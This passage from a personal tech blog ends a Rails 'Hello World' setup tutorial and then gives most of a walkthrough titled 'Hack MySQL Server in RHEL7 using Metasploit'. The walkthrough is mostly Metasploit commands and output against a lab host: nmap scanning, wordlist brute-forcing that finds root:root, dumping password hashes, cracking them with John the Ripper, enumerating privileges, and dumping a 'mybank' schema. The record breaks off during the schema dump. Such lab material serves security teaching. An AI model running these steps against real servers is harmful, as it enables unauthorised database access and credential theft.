<span style="font-family: inherit;">[shabbir@compute1 ~]$ <b>sudo systemctl enable mariadb</b></span></div>
<div class="code-pre " style="text-align: left;">
<br />
<span style="font-family: inherit;">[shabbir@compute1 ~]$ <b>sudo systemctl start mariadb</b><code> </code></span></div>
<br />
<span style="font-family: inherit;">[shabbir@compute1 ~]$ </span><span style="font-family: inherit;"><b>gem install mysql</b></span><br />
<div class="code-pre " style="text-align: left;">
<span style="font-family: inherit;"><code><br /><b></b></code></span></div>
[shabbir@compute1 ~]$ <b>rbenv rehash</b><br />
<br />
<br />
<br />
7) Create 'Hello World' Application<br />
<br />
7.1) Create Demo Project<br />
<div class="result notranslate" style="text-align: left;">
<span style="font-family: inherit;"><span style="font-family: inherit;">[shabbir@compute1 ~]$</span> <b>rails new demo</b></span></div>
<div class="result notranslate" style="text-align: left;">
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">7.2) Start the Web Server.</span></div>
<div class="result notranslate" style="text-align: left;">
<span style="font-family: inherit;"><span style="font-family: inherit;">[shabbir@compute1 ~]$</span><b> cd demo</b> </span></div>
<div class="result notranslate" style="text-align: left;">
<br />
<span style="font-family: inherit;"><span style="font-family: inherit;">[shabbir@compute1 <span style="font-family: inherit;">demo</span>]$</span> <b>rails server</b></span></div>
<div class="result notranslate" style="text-align: left;">
<br /></div>
<div class="result notranslate" style="text-align: left;">
<span style="font-family: inherit;">7.3) Open a browser and type the following URL. <b>http://localhost:3000</b></span><br />
<span style="font-family: inherit;"><b> </b> </span></div>
<pre class="result notranslate"></pre>
<pre class="result notranslate"></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhl9gvMKHB6ZIKiJqytboeve8ThM1HzNsO85VJulJabS2T34nmM2ZBhG4-U-XWuNA6QlCY20A2AE28wK3wBx-S76kYvNpavTrqRjfkxxaOn_b_tE03lRk1KbDQ9OOVumoudOhyDWMYpZcTY/s1600/Screenshot+from+2015-11-02+03%253A20%253A41.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="220" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhl9gvMKHB6ZIKiJqytboeve8ThM1HzNsO85VJulJabS2T34nmM2ZBhG4-U-XWuNA6QlCY20A2AE28wK3wBx-S76kYvNpavTrqRjfkxxaOn_b_tE03lRk1KbDQ9OOVumoudOhyDWMYpZcTY/s320/Screenshot+from+2015-11-02+03%253A20%253A41.png" width="320" /></a></div>
<br />
<pre class="result notranslate"></pre>
<br />
NOTE: To stop the web server, hit Ctrl+C in the terminal window where it's
running. <br />
<pre class="result notranslate"></pre>
<div class="result notranslate" style="text-align: left;">
<br />
7.4) Create a new controller called "welcome" with an action called "index". <br />
<br />
[shabbir@compute1 demo]$ <b>generate controller welcome index</b><br />
create app/controllers/welcome_controller.rb<br />
route get 'welcome/index'<br />
invoke erb<br />
create app/views/welcome<br />
create app/views/welcome/index.html.erb<br />
invoke test_unit<br />
create test/controllers/welcome_controller_test.rb<br />
invoke helper<br />
create app/helpers/welcome_helper.rb<br />
invoke test_unit<br />
invoke assets<br />
invoke coffee<br />
create app/assets/javascripts/welcome.coffee<br />
invoke scss<br />
create app/assets/stylesheets/welcome.scss<br />
<br />
<br />
<br />
<div style="text-align: left;">
The controller, is located at
<span style="font-family: inherit;"><code>app/controllers/welcome_controller.rb</code></span> and the view, located at
<code>app/views/welcome/index.html.erb</code>.</div>
<br />
<br />
7.5) Edit the View.<br />
<br />
[shabbir@compute1 demo]$ <b>vi app/views/welcome/index.html.erb </b><br />
<br />
<b><h1>Hello, World!</h1></b><br />
<br />
<br />
<br />
7.6) Now that we have made the controller and view, we need to tell Rails when we
want "Hello, World!" to show up. In our case, we want it to show up when we
navigate to the root URL of our site, <a href="http://localhost:3000/">http://localhost:3000</a>. At the moment,
"Welcome aboard" is occupying that spot.<br />
<br />
Edit the application's routing file. <br />
[shabbir@compute1 demo]$ <b>vi config/routes.rb </b><br />
<br />
Uncomment the following line <br />
<b> root 'welcome#index'</b><br />
<br />
<br />
<span style="font-family: inherit;">7.<span style="font-family: inherit;">7</span>) Ensure that the Web server is running. Open a browser and type the following URL. <b>http://localhost:3000</b> </span><br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-WOMimtctHnUjd2yVdd2Y9z5_6b7z0QhHBd4RTrJ9CR1PhinMAwIPmKquNaqSPPkWfNu4fJLkxEaR6MmdK8fsTQTYIP5E5hNyAZRH8MfvPda8RF4LA0pH-USwyDoutXxHy8G8HORbDFlB/s1600/Screenshot+from+2015-11-02+15%253A54%253A43.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="220" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-WOMimtctHnUjd2yVdd2Y9z5_6b7z0QhHBd4RTrJ9CR1PhinMAwIPmKquNaqSPPkWfNu4fJLkxEaR6MmdK8fsTQTYIP5E5hNyAZRH8MfvPda8RF4LA0pH-USwyDoutXxHy8G8HORbDFlB/s320/Screenshot+from+2015-11-02+15%253A54%253A43.png" width="320" /></a></div>
<br /></div>
<pre class="result notranslate"></pre>
</div>
Shabbir Rangwalahttp://www.blogger.com/profile/06038985133173388069noreply@blogger.com2tag:blogger.com,1999:blog-1164086323266606043.post-83347432730584544952015-06-27T15:49:00.000+05:302015-06-27T17:16:59.676+05:30Hack MySQL Server in RHEL7 using Metasploit in Kali Linux<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
In this tutorial, we will hack MySQL Server running in RHEL 7 using Metasploit running in Kali Linux.<br />
<br />
MySQL Server Name: meru.mycompany.com<br />
MySQL Server IP Address: 192.168.122.1 <br />
<br />
Perform the following steps on the Kali Linux Machine<br />
<br />
1) <span style="color: blue;">Start the services.</span><br />
<span style="background-color: #fce5cd;">root@kali:~# <b>service postgresql start</b></span><br />
<span style="background-color: #fce5cd;">[ ok ] Starting PostgreSQL 9.1 database server: main.</span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">root@kali:~# <b>service metasploit start</b></span><br />
<span style="background-color: #fce5cd;">[ ok ] Starting Metasploit rpc server: prosvc.[ ok ] Starting Metasploit web server: thin.</span><br />
<span style="background-color: #fce5cd;">[ ok ] Starting Metasploit worker: worker.</span><br />
<br />
<span style="background-color: #fce5cd;">root@kali:~# <b>msfconsole</b></span><br />
<span style="background-color: #fce5cd;">msf ></span><br />
<br />
<br />
2) <span style="color: blue;">Perform nmap scan on MySQL Server</span>.<br />
<span style="background-color: #fce5cd;">msf > <b>db_nmap -sV 192.168.122.1 -p 3306</b></span><br />
<span style="background-color: #fce5cd;">[*] Nmap: Starting Nmap 6.47 ( http://nmap.org ) at 2015-06-27 10:03 IST</span><br />
<span style="background-color: #fce5cd;">[*] Nmap: Nmap scan report for meru.mycompany.com (192.168.122.1)</span><br />
<span style="background-color: #fce5cd;">[*] Nmap: Host is up (0.00034s latency).</span><br />
<span style="background-color: #fce5cd;">[*] Nmap: PORT STATE SERVICE VERSION</span><br />
<span style="background-color: #fce5cd;">[*] Nmap: <span style="color: red;">3306/tcp open mysql MySQL 5.5.35-MariaDB</span></span><br />
<span style="background-color: #fce5cd;">[*] Nmap: MAC Address: 52:54:00:8A:8D:BA (QEMU Virtual NIC)</span><br />
<span style="background-color: #fce5cd;">[*] Nmap: Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .</span><br />
<span style="background-color: #fce5cd;">[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 0.71 seconds</span><br />
<br />
<br />
3) <span style="color: blue;">Perform brute force password attack.</span><br />
<span style="background-color: #fce5cd;">msf ><b> use auxiliary/scanner/mysql/mysql_login </b></span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">msf auxiliary(mysql_login) > <b>show options</b></span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">Module options (auxiliary/scanner/mysql/mysql_login):</span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;"> Name Current Setting Required Description</span><br />
<span style="background-color: #fce5cd;"> ---- --------------- -------- -----------</span><br />
<span style="background-color: #fce5cd;"> BLANK_PASSWORDS false no Try blank passwords for all users</span><br />
<span style="background-color: #fce5cd;"> BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5</span><br />
<span style="background-color: #fce5cd;"> DB_ALL_CREDS false no Try each user/password couple stored in the current database</span><br />
<span style="background-color: #fce5cd;"> DB_ALL_PASS false no Add all passwords in the current database to the list</span><br />
<span style="background-color: #fce5cd;"> DB_ALL_USERS false no Add all users in the current database to the list</span><br />
<span style="background-color: #fce5cd;"> PASSWORD no A specific password to authenticate with</span><br />
<span style="background-color: #fce5cd;"><span style="color: red;"> PASS_FILE no File containing passwords, one per line</span></span><br />
<span style="background-color: #fce5cd;"> Proxies no A proxy chain of format type:host:port[,type:host:port][...]</span><br />
<span style="background-color: #fce5cd;"><span style="color: red;"> RHOSTS yes The target address range or CIDR identifier<br /> RPORT 3306 yes The target port</span></span><br />
<span style="background-color: #fce5cd;"> <span style="color: red;"> STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host</span></span><br />
<span style="background-color: #fce5cd;"> THREADS 1 yes The number of concurrent threads</span><br />
<span style="background-color: #fce5cd;"> USERNAME no A specific username to authenticate as</span><br />
<span style="background-color: #fce5cd;"> USERPASS_FILE no File containing users and passwords separated by space, one pair per line</span><br />
<span style="background-color: #fce5cd;"> USER_AS_PASS false no Try the username as the password for all users</span><br />
<span style="background-color: #fce5cd;"><span style="color: red;"> USER_FILE no File containing usernames, one per line</span></span><br />
<span style="background-color: #fce5cd;"> VERBOSE true yes Whether to print output for all attempts</span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">msf auxiliary(mysql_login) > <b>set USER_FILE /usr/share/metasploit-framework/data/wordlists/unix_users.txt</b></span><br />
<span style="background-color: #fce5cd;">USER_FILE => /usr/share/metasploit-framework/data/wordlists/unix_users.txt</span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">msf auxiliary(mysql_login) > <b>set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt</b></span><br />
<span style="background-color: #fce5cd;">PASS_FILE => /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt</span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">msf auxiliary(mysql_login) > <b>set RHOSTS 192.168.122.1</b></span><br />
<span style="background-color: #fce5cd;">RHOSTS => 192.168.122.1</span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">msf auxiliary(mysql_login) > <b><span style="color: black;">set STOP_ON_SUCCESS true</span></b></span><br />
<span style="background-color: #fce5cd;">STOP_ON_SUCCESS => true</span><br />
<br />
<span style="background-color: #fce5cd;">msf auxiliary(mysql_login) > <b>run</b></span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">[*] 192.168.122.1:3306 MYSQL - Found remote MySQL version 5.5.35</span><br />
<span style="background-color: #fce5cd;">Access denied for user 'anon'@'192.168.122.115' (using password: YES))</span><span style="background-color: #fce5cd;">[-] 192.168.122.1:3306 MYSQL - LOGIN FAILED: anon:iloveyou (Incorrect: Access denied for user 'anon'@'192.168.122.115' (using password: YES))</span><br />
<span style="background-color: #fce5cd;">[-] 192.168.122.1:3306 MYSQL - LOGIN FAILED: anon:admin (Incorrect: Access denied for user 'anon'@'192.168.122.115' (using password: YES))</span><br />
<span style="background-color: #fce5cd;">[+] <span style="color: red;">192.168.122.1:3306 MYSQL - Success: 'root:root'</span></span><br />
<span style="background-color: #fce5cd;">[*] Scanned 1 of 1 hosts (100% complete)</span><br />
<span style="background-color: #fce5cd;">[*] Auxiliary module execution completed</span><br />
<br />
<br />
As seen above, we have cracked login credentials for User '<span style="color: red;">root</span>' with password '<span style="color: red;">root</span>'<br />
<br />
<br />
4) <span style="color: blue;">Capture other user credentials. <span style="color: black;">We will capture the password hashes and then crack it using John the Ripper.</span></span><br />
<br />
<span style="background-color: #fce5cd;">msf > <b>use auxiliary/scanner/mysql/mysql_hashdump </b><br />msf auxiliary(mysql_hashdump) > <b>show options</b><br /><br />Module options (auxiliary/scanner/mysql/mysql_hashdump):<br /><br /> Name Current Setting Required Description<br /> ---- --------------- -------- -----------<br /> <span style="color: red;"> PASSWORD no The password for the specified username<br /> RHOSTS yes The target address range or CIDR identifier</span><br /> RPORT 3306 yes The target port<br /> THREADS 1 yes The number of concurrent threads<br /> <span style="color: red;"> USERNAME no The username to authenticate as</span></span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">msf auxiliary(mysql_hashdump) > <b>set USERNAME root</b><br />USERNAME => root<br />msf auxiliary(mysql_hashdump) > <b>set PASSWORD root</b><br />PASSWORD => root<br />msf auxiliary(mysql_hashdump) > <b>run</b><br /><br />[+] Saving HashString as Loot: root:*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B<br />[+] Saving HashString as Loot: root:*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B<br />[+] Saving HashString as Loot: root:*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B<br />[+] Saving HashString as Loot: shabbir:*8A5EC1AC3F305AF2D49B4AC632B4829A9440E667<br />[+] Saving HashString as Loot: user:*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19<br />[+] Saving HashString as Loot: anon@localhost:*2CE4701D02A76C12CD513109CA16967A68B4C23A<br />[+] Saving HashString as Loot: anon:*2CE4701D02A76C12CD513109CA16967A68B4C23A<br />[+] Saving HashString as Loot: anon:*2CE4701D02A76C12CD513109CA16967A68B4C23A<br />[+] Saving HashString as Loot: root:*01A6717B58FF5C7EAFFF6CB7C96F7428EA65FE4C<br />[*] Scanned 1 of 1 hosts (100% complete)<br />[*] Auxiliary module execution completed</span><br />
<br />
<br />
Open another terminal window and copy the password hashes to a file 'temp' as shown below.<br />
<span style="background-color: #fce5cd;">root@kali:~# <b>vi temp</b></span><br />
<br />
<span style="background-color: #fce5cd;">root:*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B</span><br />
<span style="background-color: #fce5cd;">root:*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B</span><br />
<span style="background-color: #fce5cd;">root:*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B</span><br />
<span style="background-color: #fce5cd;">shabbir:*8A5EC1AC3F305AF2D49B4AC632B4829A9440E667</span><br />
<span style="background-color: #fce5cd;">user:*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19</span><br />
<span style="background-color: #fce5cd;">anon@localhost:*2CE4701D02A76C12CD513109CA16967A68B4C23A</span><br />
<span style="background-color: #fce5cd;">anon:*2CE4701D02A76C12CD513109CA16967A68B4C23A</span><br />
<span style="background-color: #fce5cd;">anon:*2CE4701D02A76C12CD513109CA16967A68B4C23A</span><br />
<span style="background-color: #fce5cd;">root:*01A6717B58FF5C7EAFFF6CB7C96F7428EA65FE4C</span><br />
<br />
<br />
Run <span style="color: red;">John the Ripper</span> to crack the hashes. <br />
<br />
<span style="background-color: #fce5cd;">root@kali:~# <b>john temp</b></span><br />
<span style="background-color: #fce5cd;">Created directory: /root/.john</span><br />
<span style="background-color: #fce5cd;">Loaded 9 password hashes with no different salts (MySQL 4.1 double-SHA-1 [128/128 SSE2 intrinsics 4x])</span><br />
<span style="background-color: #fce5cd;">root (root)</span><br />
<span style="background-color: #fce5cd;">root (root)</span><br />
<span style="background-color: #fce5cd;">root (root)</span><br />
<span style="background-color: #fce5cd;">shabbir (shabbir)</span><br />
<span style="background-color: #fce5cd;">password (user)</span><br />
<span style="background-color: #fce5cd;">princess (anon@localhost)</span><br />
<span style="background-color: #fce5cd;">princess (anon)</span><br />
<span style="background-color: #fce5cd;">princess (anon)</span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">root@kali:~# <b>john temp --show</b></span><br />
<span style="background-color: #fce5cd;"><span style="color: red;">root:root</span></span><br />
<span style="background-color: #fce5cd;"><span style="color: red;">root:root</span></span><br />
<span style="background-color: #fce5cd;"><span style="color: red;">root:root</span></span><br />
<span style="background-color: #fce5cd;"><span style="color: red;">shabbir:shabbir</span></span><br />
<span style="background-color: #fce5cd;"><span style="color: red;">user:password</span></span><br />
<span style="background-color: #fce5cd;"><span style="color: red;">anon@localhost:princess</span></span><br />
<span style="background-color: #fce5cd;"><span style="color: red;">anon:princess</span></span><br />
<span style="background-color: #fce5cd;"><span style="color: red;">anon:princess</span></span><br />
<br />
<br />
<br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: white;">5) <span style="color: blue;">Browse MySQL Server.</span></span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">msf > <b>use auxiliary/admin/mysql/mysql_enum </b></span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">msf auxiliary(mysql_enum) ><b> show options</b></span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">Module options (auxiliary/admin/mysql/mysql_enum):</span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;"> Name Current Setting Required Description</span><br />
<span style="background-color: #fce5cd;"> ---- --------------- -------- -----------</span><br />
<span style="background-color: #fce5cd;"> <span style="color: red;">PASSWORD no The password for the specified username</span></span><br />
<span style="background-color: #fce5cd;"><span style="color: red;"> RHOST yes The target address</span></span><br />
<span style="background-color: #fce5cd;"> RPORT 3306 yes The target port</span><br />
<span style="background-color: #fce5cd;"> <span style="color: red;"> USERNAME no The username to authenticate as</span></span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">msf auxiliary(mysql_enum) > <b>set RHOST 192.168.122.1</b></span><br />
<span style="background-color: #fce5cd;">RHOST => 192.168.122.1</span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">msf auxiliary(mysql_enum) > <b>set USERNAME root</b></span><br />
<span style="background-color: #fce5cd;">USERNAME => root</span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">msf auxiliary(mysql_enum) > <b>set PASSWORD root</b></span><br />
<span style="background-color: #fce5cd;">PASSWORD => root</span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">msf auxiliary(mysql_enum) > <b>run</b></span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">[*] Running MySQL Enumerator...</span><br />
<span style="background-color: #fce5cd;">[*] Enumerating Parameters</span><br />
<span style="background-color: #fce5cd;">[*] MySQL Version: 5.5.35-MariaDB</span><br />
<span style="background-color: #fce5cd;">[*] Compiled for the following OS: Linux</span><br />
<span style="background-color: #fce5cd;">[*] Architecture: x86_64</span><br />
<span style="background-color: #fce5cd;">[*] Server Hostname: meru.mycompany.com</span><br />
<span style="background-color: #fce5cd;">[*] Data Directory: /var/lib/mysql/</span><br />
<span style="background-color: #fce5cd;">[*] Logging of queries and logins: OFF</span><br />
<span style="background-color: #fce5cd;">[*] Old Password Hashing Algorithm OFF</span><br />
<span style="background-color: #fce5cd;">[*] Loading of local files: ON</span><br />
<span style="background-color: #fce5cd;">[*] Logins with old Pre-4.1 Passwords: OFF</span><br />
<span style="background-color: #fce5cd;">[*] Allow Use of symlinks for Database Files: DISABLED</span><br />
<span style="background-color: #fce5cd;">[*] Allow Table Merge: </span><br />
<span style="background-color: #fce5cd;">[*] SSL Connection: DISABLED</span><br />
<span style="background-color: #fce5cd;">[*] Enumerating Accounts:</span><br />
<span style="background-color: #fce5cd;">[*] List of Accounts with Password Hashes:</span><br />
<span style="background-color: #fce5cd;">[*] User: root Host: localhost Password Hash: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B</span><br />
<span style="background-color: #fce5cd;">[-] *** auxiliary/admin/mysql/mysql_enum is still calling the deprecated report_auth_info method! This needs to be updated!</span><br />
<span style="background-color: #fce5cd;">[*] User: root Host: 127.0.0.1 Password Hash: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B</span><br />
<span style="background-color: #fce5cd;">[-] *** auxiliary/admin/mysql/mysql_enum is still calling the deprecated report_auth_info method! This needs to be updated!</span><br />
<span style="background-color: #fce5cd;">[*] User: root Host: ::1 Password Hash: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B</span><br />
<span style="background-color: #fce5cd;">[-] *** auxiliary/admin/mysql/mysql_enum is still calling the deprecated report_auth_info method! This needs to be updated!</span><br />
<span style="background-color: #fce5cd;">[*] User: shabbir Host: % Password Hash: *8A5EC1AC3F305AF2D49B4AC632B4829A9440E667</span><br />
<span style="background-color: #fce5cd;">[-] *** auxiliary/admin/mysql/mysql_enum is still calling the deprecated report_auth_info method! This needs to be updated!</span><br />
<span style="background-color: #fce5cd;">[*] User: user Host: localhost Password Hash: *2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19</span><br />
<span style="background-color: #fce5cd;">[-] *** auxiliary/admin/mysql/mysql_enum is still calling the deprecated report_auth_info method! This needs to be updated!</span><br />
<span style="background-color: #fce5cd;">[*] User: anon@localhost Host: % Password Hash: *2CE4701D02A76C12CD513109CA16967A68B4C23A</span><br />
<span style="background-color: #fce5cd;">[-] *** auxiliary/admin/mysql/mysql_enum is still calling the deprecated report_auth_info method! This needs to be updated!</span><br />
<span style="background-color: #fce5cd;">[*] User: anon Host: localhost Password Hash: *2CE4701D02A76C12CD513109CA16967A68B4C23A</span><br />
<span style="background-color: #fce5cd;">[-] *** auxiliary/admin/mysql/mysql_enum is still calling the deprecated report_auth_info method! This needs to be updated!</span><br />
<span style="background-color: #fce5cd;">[*] User: anon Host: 192.168.122.% Password Hash: *2CE4701D02A76C12CD513109CA16967A68B4C23A</span><br />
<span style="background-color: #fce5cd;">[-] *** auxiliary/admin/mysql/mysql_enum is still calling the deprecated report_auth_info method! This needs to be updated!</span><br />
<span style="background-color: #fce5cd;">[*] User: root Host: % Password Hash: *01A6717B58FF5C7EAFFF6CB7C96F7428EA65FE4C</span><br />
<span style="background-color: #fce5cd;">[-] *** auxiliary/admin/mysql/mysql_enum is still calling the deprecated report_auth_info method! This needs to be updated!</span><br />
<span style="background-color: #fce5cd;">[*] The following users have GRANT Privilege:</span><br />
<span style="background-color: #fce5cd;">[*] User: root Host: localhost</span><br />
<span style="background-color: #fce5cd;">[*] User: root Host: 127.0.0.1</span><br />
<span style="background-color: #fce5cd;">[*] User: root Host: ::1</span><br />
<span style="background-color: #fce5cd;">[*] The following users have CREATE USER Privilege:</span><br />
<span style="background-color: #fce5cd;">[*] User: root Host: localhost</span><br />
<span style="background-color: #fce5cd;">[*] User: root Host: 127.0.0.1</span><br />
<span style="background-color: #fce5cd;">[*] User: root Host: ::1</span><br />
<span style="background-color: #fce5cd;">[*] User: root Host: %</span><br />
<span style="background-color: #fce5cd;">[*] The following users have RELOAD Privilege:</span><br />
<span style="background-color: #fce5cd;">[*] User: root Host: localhost</span><br />
<span style="background-color: #fce5cd;">[*] User: root Host: 127.0.0.1</span><br />
<span style="background-color: #fce5cd;">[*] User: root Host: ::1</span><br />
<span style="background-color: #fce5cd;">[*] User: root Host: %</span><br />
<span style="background-color: #fce5cd;">[*] The following users have SHUTDOWN Privilege:</span><br />
<span style="background-color: #fce5cd;">[*] User: root Host: localhost</span><br />
<span style="background-color: #fce5cd;">[*] User: root Host: 127.0.0.1</span><br />
<span style="background-color: #fce5cd;">[*] User: root Host: ::1</span><br />
<span style="background-color: #fce5cd;">[*] User: root Host: %</span><br />
<span style="background-color: #fce5cd;">[*] The following users have SUPER Privilege:</span><br />
<span style="background-color: #fce5cd;">[*] User: root Host: localhost</span><br />
<span style="background-color: #fce5cd;">[*] User: root Host: 127.0.0.1</span><br />
<span style="background-color: #fce5cd;">[*] User: root Host: ::1</span><br />
<span style="background-color: #fce5cd;">[*] User: root Host: %</span><br />
<span style="background-color: #fce5cd;">[*] The following users have FILE Privilege:</span><br />
<span style="background-color: #fce5cd;">[*] User: root Host: localhost</span><br />
<span style="background-color: #fce5cd;">[*] User: root Host: 127.0.0.1</span><br />
<span style="background-color: #fce5cd;">[*] User: root Host: ::1</span><br />
<span style="background-color: #fce5cd;">[*] User: root Host: %</span><br />
<span style="background-color: #fce5cd;">[*] The following users have PROCESS Privilege:</span><br />
<span style="background-color: #fce5cd;">[*] User: root Host: localhost</span><br />
<span style="background-color: #fce5cd;">[*] User: root Host: 127.0.0.1</span><br />
<span style="background-color: #fce5cd;">[*] User: root Host: ::1</span><br />
<span style="background-color: #fce5cd;">[*] User: root Host: %</span><br />
<span style="background-color: #fce5cd;">[*] The following accounts have privileges to the mysql database:</span><br />
<span style="background-color: #fce5cd;">[*] User: root Host: localhost</span><br />
<span style="background-color: #fce5cd;">[*] User: root Host: 127.0.0.1</span><br />
<span style="background-color: #fce5cd;">[*] User: root Host: ::1</span><br />
<span style="background-color: #fce5cd;">[*] User: root Host: %</span><br />
<span style="background-color: #fce5cd;">[*] The following accounts are not restricted by source:</span><br />
<span style="background-color: #fce5cd;">[*] User: anon@localhost Host: %</span><br />
<span style="background-color: #fce5cd;">[*] User: root Host: %</span><br />
<span style="background-color: #fce5cd;">[*] User: shabbir Host: %</span><br />
<span style="background-color: #fce5cd;">[*] Auxiliary module execution completed</span><br />
<br />
<br />
6) <span style="color: blue;">View MySQL Server Database Schema.</span><br />
<br />
<span style="background-color: #fce5cd;">msf > <b>info auxiliary/scanner/mysql/mysql_schemadump </b></span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;"> Name: MYSQL Schema Dump</span><br />
<span style="background-color: #fce5cd;"> Module: auxiliary/scanner/mysql/mysql_schemadump</span><br />
<span style="background-color: #fce5cd;"> License: Metasploit Framework License (BSD)</span><br />
<span style="background-color: #fce5cd;"> Rank: Normal</span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">Provided by:</span><br />
<span style="background-color: #fce5cd;"> theLightCosine <theLightCosine@metasploit.com></span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">Basic options:</span><br />
<span style="background-color: #fce5cd;"> Name Current Setting Required Description</span><br />
<span style="background-color: #fce5cd;"> ---- --------------- -------- -----------</span><br />
<span style="background-color: #fce5cd;"> DISPLAY_RESULTS true yes Display the Results to the Screen</span><br />
<span style="background-color: #fce5cd;"><span style="color: red;"> PASSWORD no The password for the specified username</span></span><br />
<span style="background-color: #fce5cd;"><span style="color: red;"> RHOSTS yes The target address range or CIDR identifier</span></span><br />
<span style="background-color: #fce5cd;"><span style="color: red;"> RPORT 3306 yes The target port</span></span><br />
<span style="background-color: #fce5cd;"> THREADS 1 yes The number of concurrent threads</span><br />
<span style="background-color: #fce5cd;"> <span style="color: red;"> USERNAME no The username to authenticate as</span></span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">Description:</span><br />
<span style="background-color: #fce5cd;"> <span style="color: red;">This module extracts the schema information from a MySQL DB server.</span></span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">msf > <b>use auxiliary/scanner/mysql/mysql_schemadump </b></span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">msf auxiliary(mysql_schemadump) > <b>set USERNAME shabbir</b></span><br />
<span style="background-color: #fce5cd;">USERNAME => shabbir</span><br />
<span style="background-color: #fce5cd;">msf auxiliary(mysql_schemadump) > <b>set PASSWORD shabbir</b></span><br />
<span style="background-color: #fce5cd;">PASSWORD => shabbir</span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">msf auxiliary(mysql_schemadump) > <b>set RHOSTS 192.168.122.1</b></span><br />
<span style="background-color: #fce5cd;">RHOSTS => 192.168.122.1</span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">msf auxiliary(mysql_schemadump) > <b>run</b></span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;"><span style="color: red;">[*] Schema stored in: /root/.msf4/loot/20150627113706_default_192.168.122.1_mysql_schema_138881.txt</span></span><br />
<span style="background-color: #fce5cd;">[+] MySQL Server Schema </span><br />
<span style="background-color: #fce5cd;"> Host: 192.168.122.1 </span><br />
<span style="background-color: #fce5cd;"> Port: 3306 </span><br />
<span style="background-color: #fce5cd;"> ====================</span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">---</span><br />
<span style="background-color: #fce5cd;">- DBName: mybank</span><br />
<span style="background-color: #fce5cd;"> Tables:</span><br />
<span style="background-color: #fce5cd;"> - TableName: customer</span><br />
<span style="background-color: #fce5cd;"> Columns:</span><br />
<span style="background-color: #fce5cd;"> - ColumnName: loginid</span><br />
<span style="background-color: #fce5cd;"> ColumnType: varchar(50)</span><br />
<span style="background-color: #fce5cd;"> - ColumnName: passwd</span><br />
<span style="background-color: #fce5cd;"> ColumnType: varchar(50)</span><br />
<span style="background-color: #fce5cd;"> - ColumnName: custname</span><br />
<span style="background-color: #fce5cd;"> ColumnType: varchar(100)</span><br />
<span style="background-color: #fce5cd;"> - ColumnName: accountno</span><br />
<span style="background-color: #fce5cd;"> ColumnType: int(11)</span><br />
